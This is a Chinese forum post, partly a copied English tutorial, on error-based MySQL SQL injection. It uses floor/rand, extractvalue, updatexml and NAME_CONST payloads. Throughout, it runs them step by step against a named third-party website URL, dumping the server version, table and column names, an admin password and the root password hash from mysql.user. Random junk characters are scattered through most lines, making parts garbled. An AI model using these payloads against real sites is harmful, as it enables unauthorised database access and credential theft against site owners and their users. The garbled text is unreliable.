|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:5 A& v5 ^3 O5 G3 D8 |, N; x" V @
首先进行正常查询: mysql> select * from article where id = 1; Z+ i9 M, t- ]* i& P% k1 j
+—-+——-+———+" |$ o* @7 T" V
| id | title | content |
7 S- e# n5 s% D2 }7 c" m5 `& [' b+—-+——-+———+
: v% | r5 S( M6 N| 1 | test | do it |
6 p% H2 H# u9 i5 @) _* x+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);* X0 {9 `. b7 e! W# s( J
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。# q% S9 E' K) K9 z1 y; d9 @7 ^
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 w( P' Y C) |2 u# @. y( S
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
}7 C+ w' j# Y9 q/ @ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
) u0 E, c3 e6 Y; c0 ]测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" K; q6 f4 |$ y. iERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
; j- ]0 Y5 J; y% c c# _9 x9 ^6 M( M; `0 J$ d6 U
再收集:
2 U, }, E4 k; U* T, C3 ahttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
, H# ?' i% }0 e7 Z5 v
) Z- V" e/ i6 x. z& M" HError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
( d. N6 f' x. n6 o$ c( m0 ~9 T7 }. b/ ?; H
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
2 J* [( k$ N% Q9 O7 F# F3 o1 W& I, m3 n9 }6 G$ e% Z
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 L. O9 C0 E( @. U
5 e1 h& N: F* DMYSQL高版本报错注入技巧-利用NAME_CONST注入
0 n4 p& \+ @0 X7 |! nIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
; u& \* {3 |1 y; t# P8 r# e' s# A! t1 g+ K2 e+ F
# v5 P5 U3 w' [0 C2 A2 g
相关信息% q N* A. e1 U
2 |. K8 }- g# b3 u( N: W* A
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. R! G0 V5 m& p7 ]
4 I8 J9 K8 A. @2 n, L
Code:
~" I% s: s ]4 ONAME_CONST(DATA, VALUE)
# V, |6 R; l/ u/ V+ J* Q6 Q d# ~2 Y5 _
E0 Z8 n1 L1 W2 H9 X" D% f2 JReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
* b ^4 w! B- L' Y0 U7 q
: e) }: {) v) C( @" ?0 s5 xSELECT NAME_CONST('TEST', 1)
# O& S$ T$ b, j U8 r
" ~. L7 n" a; c8 ]3 }& `3 Q2 q! u0 j- Q" L# `
% U7 W( Z6 i: g' Q2 x/ H, V|---------------|$ l) \, p' z7 H$ V& u
| TEST |
. k, n/ d/ X8 f% `| |
2 |& }7 \2 _& T, k4 L* ?. \|---------------|
2 O& f# w( _! w4 e$ I5 r2 j| 1 |
; Q# Y$ ^ E+ ` R| |4 f8 ^+ g: d$ L
|---------------|/ P/ u# r7 { Z$ Z2 J0 q
$ h% \. J$ W E- N) Z! m- U7 k3 W: S4 e! K5 m; P* M( U) e, ?) U9 u
5 w3 u' u* T* J3 [! W* g3 m
) @8 q4 C( o! {9 v* t2 hhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
% _7 p$ @! h' H# [) [* W& A+ V6 CIntro to MySQL Variables
: ^- Q B9 G+ \* U+ y+ ?7 H6 J0 U6 F8 J. F9 u' @
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.1 h% B) ]' |" j! Q F; ^
- J# |- q4 }6 u# T3 w' V, C
Code:" E; N5 B0 }; r8 a4 K1 i( q+ V9 [
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
& {1 i. u2 U o. d# A- \/ I* s9 i2 b- F0 X
+ ^/ @% \" [" q. \# Y
4 b4 \- H3 \3 z. w
0 Y- ^/ f! B) T! K# q' A8 ^
" U" \+ c4 U% r* c0 _% l qCode:: `0 D+ w/ {: u8 @0 Y) |# b% W! V, a4 Y
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
3 c; Y! C' g( Z9 d9 W5 K2 }' I$ \# x( V' h3 c0 }
4 `6 w$ m, h8 }' Y
VAR = Your MySQL variable.
) {3 M0 Y) Q/ @: c( } {0 Q5 [, b# A3 p. q
MySQL 5.1.3 Server System Variables: O: x+ o* ?; f2 r* O7 ~4 b
1 |- |6 H# w8 H) s8 FLet's try it out on my site..
' d% Z- ~" g3 ?% ^, f. w) |; ^2 K2 w. s' t5 d% q9 s/ H
Code:7 ~- n2 T3 g, }8 G4 G% G, B. a
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--, |) \3 |8 x( f% z2 b
9 I, n- S3 x- wErroruplicate column name '5.0.27-community-nt'
7 Q9 ?3 b& |8 H: {& V% j8 A
, d" ^4 T! q. v8 f; v% S" L3 [9 |+ G% N/ k5 H' g+ h
4 b3 @% e. o+ e R2 J# e
9 k3 ^! r# V# U' P; ]% r
1 e! A. c$ M" o) I; f$ R; G
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...- B! t4 e2 m5 X! ^$ F4 Y# R
6 n) r& Z" q" A$ CData Extraction7 \5 J, i+ j% }, K0 `" I* }
( j7 B* N' t- j/ jCode:! I% ]$ q E2 @
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
* m' S0 G+ L$ A/ ~5 z2 k6 d8 t) _* e
6 D$ D# c* ~% k
We should get a duplicate column 1 error...
8 S; f% Q6 o. A. ?" S. R, U" H. o: u# p0 m0 e! ~+ _
Code:+ {4 U( s* H+ `2 H: ?" k# Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
; u) }; y( a; h
Q* X2 j5 k; n1 g1 RErroruplicate column name '1
0 j) x0 z' S; c7 D u, ~
2 I* I! ?/ H. x5 H1 C3 b) p0 _# F
9 U% A1 p/ B2 F0 S0 A. ^: V3 _" ~) g, S! a1 k
0 E0 R9 X$ `9 M& O3 U! [5 v7 t* M9 a8 d6 m V
. b9 M7 ~ I' w( c/ H
Now let's get the tables out this bitch..
. Q- m" r( `8 q2 b$ h# t# b" f# m& u
Code:
# R- `- U" `6 K3 j+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! Y; ]6 u0 y% q5 i; t/ R. W) l& _# D9 v ^& {, m. e" j: F& j$ g
, z! \$ v0 K, ] V5 mLet's see if it works here, if it does, we can go on and finish the job.2 L1 U3 b: n; Y8 L, Q
* l" C! X* H2 C: C
Code:
$ x+ q5 M( o9 r7 g4 m1 d9 C3 k0 Zhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
; \+ u" n3 ]* K/ C1 U1 m! ^. j; M$ |/ P- I. }5 @( N9 |/ v
% X6 m; P1 g0 o6 }
Erroruplicate column name 'com_admanage
$ g8 F! [7 D4 ]" X. |4 u h1 d- L5 b3 c; d4 F
6 {' `& ]) M" \! D0 X! J! _: ~' c" K* d7 p. R( J
/ U3 T) ?' c m. S+ X( `
7 e7 O, o2 _; P! o6 j3 \8 [3 l$ b; j
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
. u% `0 a( B4 ^" H" @4 R7 _
u+ r& _. F" `0 O, e9 k7 ILet's get the columns out of the user table..
. P0 r$ X' U. a5 H3 }2 i
2 n$ V; _# B$ I) r( _Code:
9 d, U- T* D) j# e& d. V9 J+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
1 ?4 \& V% G" I
6 F9 U0 Q0 o* D7 d" ?/ e% Z" D5 y5 M/ w5 A
So mine looks like this, and I get the duplicate column name 'Host'.
! |% z3 b8 _2 W, `) I% w
, n* s |5 a# n8 s% s& t: A' bCode:- M, |: M5 Z: T k9 w
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
7 i% s0 ^# X: m( S5 [( K: h3 |2 L6 E2 X
Erroruplicate column name 'Host'6 F1 Q7 R! Q, A
! ?) f- k# Q" n/ U8 F/ ~6 T% E0 p' \5 D
8 G4 V! b+ O( I% C3 I. c' M$ i
, d9 v! _# W" {) V9 Z9 @7 P
! T, n0 A+ ?' j6 N2 K% A2 |( B! l
- d) w. h, X1 ]+ h- s" M- {Woot, time to finish this bitch off.. U5 Z3 x& e0 V) s8 z
' D4 @/ g& \* ~% p" P/ k6 CCode:
; F6 I7 G: G: l* T+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--( B9 k+ L) t1 m$ }4 A
- j) D# C& P- F$ D- v; L4 i" i& r
$ t* u5 W9 z# u- n% I8 m4 jSo mine looks like this...
' i; l7 Q* A% c5 J' s( g8 ?" s
, I2 O" S# n7 j, d0 Y$ BCode:& z; v& x; O; q) \4 j4 z) c- @3 f
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--$ Q& N3 r) l7 U/ Z
/ j, l+ ~' W3 Q1 m' T8 ` O" m
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82' X4 w; h, Y+ B3 [: \$ |+ ~7 ~
$ @( z% ^% N/ S6 m3 ?
f0 ~( T2 J9 `, K: `
! x8 Y9 h+ h* m. H
" H2 `' y$ N! }8 }; Y1 t' Z0 h, ?& i; V! M6 h4 u% a- D3 L
/ j# L% E( [; A) V- T' uAnd there we have it, thanks for reading.
$ }, N9 E5 Z, `/ h
5 C6 C0 U4 t8 ]' H& Z |
发表于 2015-11-11 19:03:37
收藏
支持
反对